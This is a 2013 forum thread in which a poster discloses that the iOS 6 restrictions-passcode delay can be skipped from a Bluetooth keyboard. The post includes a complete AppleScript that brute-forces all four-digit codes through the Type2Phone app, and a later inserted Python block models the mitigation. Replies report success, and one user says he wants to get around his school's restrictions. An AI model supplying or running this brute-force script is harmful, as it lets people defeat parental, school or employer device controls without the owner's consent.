General Restrictions Passcode Vulnerability iOS6

Discussion in 'Jailbreaks and iOS Hacks' started by russellelly, Apr 4, 2013.

  1. russellelly, Apr 4, 2013
    Last edited: Apr 4, 2013

    russellelly macrumors regular

    Joined:
    Jun 23, 2006
    Location:
    Glasgow, UK
    #1
    Hi,

    I've found a vulnerability in iOS 6.1.2 on an iPhone 4S (probably there in other versions and for other iPhones/iPads/iPod Touches) that will allow you to brute force the restrictions passcode. Explanation is on a video at http://www.youtube.com/watch?v=dgvIdIScG0c , below is some really simple AppleScript that I have written to exploit the vulnerability.

    The gist of the solution is that iOS usually enforces a delay before re-entering a restrictions passcode after a number of failed attempts, but this is not enforced when using a bluetooth keyboard.

    Enjoy!

    Code:
    -- Author Chris Russell
    -- This script is designed to brute force the restrictions passcode on iPhone
    -- Assumptions:
    --   Bluetooth is enabled
    --   Type2Phone App is running and connected to your phone (avail on Mac App Store)
    --   iPhone is switched on and on the restrictions passcode screen (General - Restrictions)
    global pinCodeDigit1
    global pinCodeDigit2
    global pinCodeDigit3
    global pinCodeDigit4
    
    set pinCodeDigit1 to 0
    set pinCodeDigit2 to 0
    set pinCodeDigit3 to 0
    set pinCodeDigit4 to 0
    
    on keyStrokeNumber(num)
    	if (num = 0) then
    		tell application "System Events" to keystroke "0"
    	else if (num = 1) then
    		tell application "System Events" to keystroke "1"
    	else if (num = 2) then
    		tell application "System Events" to keystroke "2"
    	else if (num = 3) then
    		tell application "System Events" to keystroke "3"
    	else if (num = 4) then
    		tell application "System Events" to keystroke "4"
    	else if (num = 5) then
    		tell application "System Events" to keystroke "5"
    	else if (num = 6) then
    		tell application "System Events" to keystroke "6"
    	else if (num = 7) then
    		tell application "System Events" to keystroke "7"
    	else if (num = 8) then
    		tell application "System Events" to keystroke "8"
    	else if (num = 9) then
    		tell application "System Events" to keystroke "9"
    	end if
    end keyStrokeNumber
    
    to incrementPIN()
    	if (pinCodeDigit4 = 9) then
    		if (pinCodeDigit3 = 9) then
    			if (pinCodeDigit2 = 9) then
    				set pinCodeDigit1 to pinCodeDigit1 + 1
    				set pinCodeDigit2 to 0
    				set pinCodeDigit3 to 0
    				set pinCodeDigit4 to 0
    			else
    				set pinCodeDigit2 to pinCodeDigit2 + 1
    				set pinCodeDigit3 to 0
    				set pinCodeDigit4 to 0
    			end if
    		else
    			set pinCodeDigit3 to pinCodeDigit3 + 1
    			set pinCodeDigit4 to 0
    		end if
    	else
    		set pinCodeDigit4 to pinCodeDigit4 + 1
    	end if
    end incrementPIN
    
    to tryPin()
    	keyStrokeNumber(pinCodeDigit1)
    	keyStrokeNumber(pinCodeDigit2)
    	keyStrokeNumber(pinCodeDigit3)
    	keyStrokeNumber(pinCodeDigit4)
    	delay 1
    end tryPin
    
    try
    	«event ascrgdut»
    end try
    
    -- main application, simple ;)
    tell application "Type2Phone" to activate
    repeat 10000 times
    	tryPin()
    	incrementPIN()
    end repeat
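
Added example, not part of the original post and not Apple's code: a minimal model of the mitigation for the issue described above, with the retry delay enforced inside the verifier so that the touchscreen and an external keyboard share one failure counter. The lockout schedule and all class and function names are assumptions made for illustration.

```python
import hmac

# Constructed lockout schedule in seconds (illustrative, not Apple's real values).
LOCKOUT_AFTER = {6: 60, 7: 300, 8: 900, 9: 3600}
MAX_LOCKOUT = 3600


class PasscodeVerifier:
    """Throttle sits beside the secret check, so every input path shares it."""

    def __init__(self, pin, clock):
        self._pin = pin
        self._clock = clock          # injectable clock keeps the model testable
        self.failures = 0
        self.locked_until = 0.0

    def verify(self, guess, source):
        # `source` is accepted only to show that it plays no part in the decision.
        now = self._clock()
        if now < self.locked_until:
            return "locked"          # rejected without even comparing the guess
        if hmac.compare_digest(guess.encode(), self._pin.encode()):
            self.failures = 0
            return "ok"
        self.failures += 1
        default = MAX_LOCKOUT if self.failures > 9 else 0
        self.locked_until = now + LOCKOUT_AFTER.get(self.failures, default)
        return "wrong"


def seconds_to_exhaust(keyspace, per_try=1.0):
    """Worst-case wall-clock time to walk the whole keyspace under the throttle."""
    t = [0.0]
    verifier = PasscodeVerifier("9999", clock=lambda: t[0])
    for n in range(keyspace):
        # A guesser has to wait out any active lockout before the next entry.
        t[0] = max(t[0], verifier.locked_until) + per_try
        if verifier.verify(f"{n:04d}", source="hid-keyboard") == "ok":
            break
    return t[0]


if __name__ == "__main__":
    days = seconds_to_exhaust(10000) / 86400
    print(f"throttled worst case: {days:.0f} days; unthrottled at 1/s: {10000 / 3600:.1f} hours")
```

With the one-second pacing used in the script, an unthrottled 4-digit keyspace is exhausted in under three hours; the same walk against a verifier-level throttle takes over a year in this model.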
    
    
     
  2. SteveLeo macrumors newbie

    Joined:
    Apr 18, 2013
    #2
    I'm hoping this works, trying to get around my school's restrictions. I tried using a plist editor but since my iPad is encrypted I can only find the code if I paid $25.

    Edit: I just watched your video and it seems very legit, but after a certain amount of failed attempts doesn't it lock out and the time grows after each wrong code?
     
  3. russellelly thread starter macrumors regular

    Joined:
    Jun 23, 2006
    Location:
    Glasgow, UK
    #3
    Sorry for slow reply, didn't get a notification on your post :confused:

    I've seen reports of a maximum 10 attempt restriction, but as you saw in the video it doesn't seem to exist. It _may_ be connected to the option 'Erase Data' under the 'Passcode Lock' settings, but I think this only applies to failed passcode lock attempts. Someone on the YouTube comments reports the script getting a 9999 code (the final one the script would try!), so it looks safe. As ever, back up first just in case :)
     
  4. vlj9r macrumors member

    Joined:
    Feb 18, 2007
    #4
    Russellelly, thank you so much for this script. It worked like a charm with Type2Phone to get me back in my iPhone.

    Folks, be sure to be in sight of your iPhone so you can have an idea of what the correct password was since the script will continue to run. I missed it the first time so I ran the script again but changed it to start with 2000. In no time it guessed it right.

    This saved me so much time since now I don't have to reinstall apps or configure all my settings.

    Jerry
     
  5. sheldonfaria macrumors newbie

    Joined:
    Jun 17, 2013
    #5
    Russellelly you genius, it worked. Keep doing the good job man...:cool:
     
  6. Ethan ROCKS22 macrumors newbie

    Joined:
    Aug 4, 2013
  7. Sideswiped8 macrumors newbie

    Joined:
    Aug 28, 2013
    #7
    Other apps

    Will this work with another keyboard app? I am asking because Type2Phone is a paid app and I am broke.
     
  8. Yelofever macrumors newbie

    Joined:
    Aug 31, 2013
    #8
    This is great, it worked for me. But I wasn't around when it did it, so I never got the code. Is there a way to make it stop or highlight the correct combination?

    I'm no good with scripts but I do very much appreciate you doing this as I couldn't find the pin with plist editor and I don't want to lose my contacts and notes restoring to new.

    Any suggestions on how to narrow it down would be appreciated too.
     
  9. darricksailo macrumors 601

    darricksailo

    Joined:
    Dec 18, 2012
    #9
    Record it while it's running and then play the video at like 4x or even 8x until you find where it got the correct passcode.
     
  10. tendo912 macrumors newbie

    Joined:
    Oct 6, 2013
    #10
    apple script

    How do you make the AppleScript work for type2iphone? PLEASE HELP!!!!
     
